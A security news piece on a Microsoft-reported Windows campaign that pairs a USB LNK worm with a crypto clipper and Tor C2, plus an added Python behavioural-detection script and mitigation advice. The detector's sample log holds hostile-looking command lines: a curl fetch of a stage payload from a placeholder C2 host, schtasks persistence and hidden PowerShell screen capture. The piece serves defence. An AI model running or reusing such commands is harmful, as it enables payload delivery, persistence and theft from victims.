"The clipper in this campaign relies on Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 [command‑and‑control] server," the Microsoft Defender Security Research Team said in an analysis published Tuesday.
Scope and timeline: campaign active since February 2026
Microsoft disclosed that the Windows-based cryptocurrency clipper campaign has targeted users since February 2026. According to the Microsoft Defender Security Research Team, the operation combines a USB-delivered worm with a clipper stealer and a Tor-based command-and-control (C2) channel, enabling persistent, covert theft and occasional remote code execution.
USB LNK worm: how the infection begins
The attack chain begins with malicious Windows Shortcut (LNK) files distributed on USB storage devices. The LNK payload scans the removable drive for common document types such as DOC, XLSX, and PDF; it hides any found originals and creates new LNK files that use the same filenames but contain arguments that point to the worm component. When an unsuspecting user launches what appears to be a benign document shortcut, the worm component executes.
The worm checks whether the host is already infected and fetches a remote payload only if it is not. It also propagates to other, not-yet-infected USB drives and creates scheduled tasks as persistence for both the worm component and the stealer component.
Tor-based C2 and persistent backdoor behavior
Rather than relying on exposed IP‑based C2 infrastructure, the malware deploys a portable Tor client and routes traffic through a local SOCKS5 proxy. Microsoft reported the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers that ID with an external server. After registration, the malware enters a continuous loop that periodically polls a hidden-service C2 server for instructions.
Microsoft described this design as blending "data theft with remote code execution, turning a financially motivated stealer into a lightweight backdoor." Notably, if the C2 responds with an EVAL response, the malware executes attacker-supplied code at runtime.
Clipper mechanics: clipboard monitoring, address substitution, and screenshots
The clipper uses Windows Script Host facilities—specifically WScript and ActiveXObject—to interact with the operating system. It monitors the clipboard at high frequency, checking for wallet seed phrases and private keys about every 500 milliseconds. When it detects cryptocurrency addresses that match known blockchain address patterns, the clipper substitutes them with attacker-controlled wallet values to reroute transactions.
In addition to clipboard theft and address hijacking, the malware uploads screenshots through Tor. As an evasion measure, the clipper exits if Task Manager is among the list of actively running processes.
Recommended mitigations from Microsoft
Microsoft urged defenders to prioritize behavioral detections over static signatures. The vendor specifically recommended looking for PowerShell‑based screen capture and the use of WScript, CScript, or related script engines to launch curl, cmd.exe, PowerShell, or unexpected executables.
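One way to operationalize the behavioral detections Microsoft recommends above, as an added example rather than Microsoft's own detection logic: a small Python triage routine that runs three rules over process-creation telemetry (script host spawning curl, cmd.exe or PowerShell; script host spawning an executable outside an allowlist; PowerShell command lines that reference screen-capture APIs). The pipe-delimited `Key=Value` record format and every sample event are constructed for this example (the host name, file names and command lines are placeholders, not indicators from the campaign); the allowlist of children a script host may legitimately spawn and the .NET API names used to recognize PowerShell screen capture are assumptions to be tuned per environment.

```python
"""Behavioural triage of process-creation events for the script-host and
PowerShell screen-capture patterns discussed above.

Added example, not Microsoft's detection logic. The 'Key=Value|Key=Value'
record format and the sample events are constructed; in practice the same
three fields come from Sysmon Event ID 1 or EDR process-creation telemetry.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Children the advisory names as red flags when a script host launches them.
FLAGGED_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption for this example: what a script host may legitimately spawn here.
# Anything else is reported as an "unexpected executable".
ALLOWED_SCRIPT_HOST_CHILDREN = {"conhost.exe", "msiexec.exe"}
# Assumption: .NET API names commonly seen in PowerShell screen capture.
SCREEN_CAPTURE_RE = re.compile(
    r"CopyFromScreen|System\.Drawing|Graphics\]::FromImage", re.IGNORECASE
)
# Split on '|' only when a known field name follows, so '|' inside a
# command line does not break the record apart.
FIELD_SPLIT_RE = re.compile(r"\|(?=(?:ParentImage|Image|CommandLine)=)")


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' record into a ProcEvent."""
    fields: Dict[str, str] = {}
    for part in FIELD_SPLIT_RE.split(line):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return ProcEvent(
        fields.get("ParentImage", ""),
        fields.get("Image", ""),
        fields.get("CommandLine", ""),
    )


def evaluate(ev: ProcEvent) -> List[str]:
    """Return the names of the behavioural rules this event matches."""
    findings: List[str] = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in SCRIPT_HOSTS:
        if child in FLAGGED_CHILDREN:
            findings.append(f"script_host_spawned_{child}")
        elif child not in ALLOWED_SCRIPT_HOST_CHILDREN:
            findings.append("script_host_spawned_unexpected_executable")
    if child in {"powershell.exe", "pwsh.exe"} and SCREEN_CAPTURE_RE.search(ev.command_line):
        findings.append("powershell_screen_capture")
    return findings


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run every rule over a log and return (line_number, rule) hits in order."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        for rule in evaluate(parse_event(line)):
            hits.append((n, rule))
    return hits


# Constructed sample telemetry; hosts, paths and file names are placeholders.
SAMPLE_LOG = [
    # 1: script host fetching a payload with curl
    r"ParentImage=C:\Windows\System32\wscript.exe|Image=C:\Windows\System32\curl.exe|CommandLine=curl.exe -s http://c2.example.invalid/stage -o C:\Users\Public\stage.bin",
    # 2: script host using cmd.exe to register a scheduled task
    r"ParentImage=C:\Windows\System32\cscript.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c schtasks /create /tn Updater /tr C:\Users\Public\run.js /sc minute /mo 5",
    # 3: hidden-window PowerShell screen capture launched by a script host (fragment, abbreviated)
    r"ParentImage=C:\Windows\System32\wscript.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -w hidden -c Add-Type -AssemblyName System.Drawing; [System.Drawing.Graphics]::FromImage($b).CopyFromScreen(...)",
    # 4: renamed binary started by a script host, not on the allowlist
    r"ParentImage=C:\Windows\System32\wscript.exe|Image=C:\Users\Public\renamed_binary_placeholder.exe|CommandLine=renamed_binary_placeholder.exe",
    # 5: benign editor launch from Explorer
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\Users\alice\notes.txt",
    # 6: benign PowerShell from Explorer
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe Get-ChildItem C:\Temp",
]

if __name__ == "__main__":
    for line_no, rule in scan(SAMPLE_LOG):
        print(f"line {line_no}: {rule}")
```

The rules key on parent/child relationships and command-line content rather than file hashes, which is the point of Microsoft's advice: a renamed Tor binary or a re-packed script changes its hash but still has to be launched by wscript.exe or cscript.exe to run. The allowlist in `ALLOWED_SCRIPT_HOST_CHILDREN` is where tuning belongs; start empty, review the "unexpected executable" hits, and add only children that are genuinely expected on the hosts in question.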
Operational mitigations Microsoft listed include disabling AutoRun/AutoPlay for all removable media; blocking LNK execution from removable drives via Group Policy Objects (GPOs); restricting unnecessary use of wscript.exe or cscript.exe; and reviewing clipboard-related and screen‑capture behaviors on devices that handle sensitive financial workflows.
What this means for technologists, affected enterprises, and end users
- Technologists and security teams: Watch for behavioral indicators tied to WScript/ActiveX scripting, scheduled tasks sustaining both worm and stealer components, and unusual Tor processes launched in hidden windows. Prioritize detections that flag runtime execution of EVAL responses and PowerShell-based screen capture.
- Affected enterprises and procurement leaders: Enforce GPOs that block LNK execution from removable drives, disable AutoRun/AutoPlay on endpoints, and restrict use of script engines such as wscript.exe and cscript.exe on systems handling crypto or financial assets.
- End users and administrators of sensitive workflows: Treat USB drives with caution; be aware that seemingly familiar document shortcuts can be malicious, and review clipboard and screenshot behavior on machines used for cryptocurrency transactions.
The campaign Microsoft described combines a classic USB worm technique with modern anonymity and runtime flexibility: portable Tor and an EVAL-capable C2 make a clipboard stealer into a persistent backdoor capable of executing remote instructions. Defenders who default to signature-based controls and allow LNK execution from removable media will face an uphill fight; behavioral controls, endpoint policy hardening, and scrutiny of scripting engines are the concrete countermeasures the vendor recommends.